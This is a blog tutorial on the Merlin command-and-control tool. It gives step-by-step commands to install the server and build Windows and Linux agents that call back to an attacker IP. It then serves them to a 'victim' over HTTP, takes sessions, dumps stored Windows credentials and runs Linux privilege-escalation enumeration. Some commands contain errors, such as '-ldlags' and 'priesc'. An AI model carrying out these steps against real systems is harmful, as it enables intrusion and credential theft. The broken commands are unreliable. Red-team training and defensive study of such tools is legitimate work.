Command and Control Guide to Merlin

at 1:55 AM Tuesday, March 12, 2019

In this article, we learn how to use Merlin C2 tool. It is developed by Russel Van Tuyl in Go language.
 
Table of content:
  • Introduction
  • Installation
  • Windows exploitation
  • Windows post exploitation
  • Linux exploitation
  • Linux post exploitation
·        Introduction
 
Merlin is great cross platform Command and control tool written in Go language. It’s made of two elements i.e. the server and agent. It works on HTTP/2 protocol. The best things about merlin is that it is compiled to work on any platform and that you can even build it from source. Normally, agents are put on windows and are being listened on Linux but due to being written in Go language, Merlin lets us to put agents on any platform/machine we come across and we can listen it also on any platform. This is much more successful than others when it comes to red teaming as it makes IDS/IPS struggle to identify it.
The Merlin server is to be run in the folder where agents can call out to it. By default, the server is configured on 127.0.0.1:443 but you can change it to your own IP. The merlin agent can be, as discussed earlier, cross-complicated to run on any platform. Agents are interacted using merlin server. Any binary file is executed with target’s path variable.

Installation
Merlin’s installation is pretty tricky. The most convenient way to download is shown in this article. Installing Go language is compulsory in order for merlin to work. So, to install Go language type:
apt install golang
And then to install merlin the following commands:
mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z


Once the above commands are executed successfully, use the following command to unzip merlin server.
7z x merlinServer-Linux-x64-v0.1.4.7z


Now, after unzipping, when you use ls command; you will find the merlin server and readme file. We can check if the server is running by using the following command:
./merlinServer-Linux-x64


In “README.MD”, we find the instructions for installing “Merlin” in our system.


Now according to the readme file, we have to setup GOPATH environment variable for the installation and then install merlin using “go” instead of git clone. So, to complete these steps run the following set of commands:
echo “export GOPATH=$HOME/go” >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin
Once the directory is downloaded, lets check its contents using cd and ls commands. 


There was a cmd directory, and in it there was a directory named merlinserver where we found main.go. Run main.go as shown in the image below :
go run main.go


As you can see the tool merlin is still not running properly as there is no SSL certificate given to it. If you navigate through the /opt/merlin directory, you will find a directory named data in which there is an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:


Now if you run merlin using the command: go run main.go, merlin server will run successfully. 


Now using the following help command you can see, as shown in the image, the arguments that you can use to run your commands as desired:
go run main.go -h


Windows exploitation
 
Now, to make Merlin agent for windows type the following command:
GOOS=windows GOARCH=amd64 go build -ldlags “-X main.url=https://192.168.0.11:443” -o shell.exe main.go
Now, share the shell with the target using python server:
python -m SimpleHTTPServer 80


In order to create a listener for the shell to revert, use the following command:
go run main.go -i 192.168.0.11


And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:


Type sessions to see the list of the sessions you acquire as shown in the image below:


To access the an available session use the following command:
interact


As you have accessed the session, here you can use windows commands such as:
shell ipconfig


Then further you can use various post exploitation modules, list of which are shown in the image below:


Windows post exploitation
 
We will be using a module here to dump the credentials of windows and to activate the said post exploitation module type:
use module windows/x64/powershell/credentials/dumpCredStore


As you can see in the image above that info commands gives us all the details about the module including the options that we need to specify in the module. So therefore, let’s set the options:
set agent
run


Linux exploitation
 
Now, we will make a merlin agent for Linux machine. For this, simply type the following command:
Export GOOS=linux;export GOARCH=amd64; go build -ldflags “-s -w -X main.url=https://192.168.0.11:443” -o shell.elf main.go
Once the command is executed, your malware will be created. Use the python to share the file with victim as shown in the image below or however see it fit. For starting python HTTP server:
python -m SimpleHTTPServer 80


Setup the listener and wait for the file to get executed.
go run main.go -I 192.168.0.11


And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.


Then to access the session use the following command:
interact


Then further you can use any linux command such as:
shell ls


Linux post exploitation
 
Even in linux you can further use number of post exploitation modules. The one we will be using in this article is privesc/LinEnum:
use module linux/x64/bash/priesc/LinEnum


Through info command, we know that we have to give session in order to run this module. So, type:
set agent
run 


And this way your module will run. Try and work with Merlin c2 tool as its one of best and as you can see how conveniently it is crossed-platformed.
Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)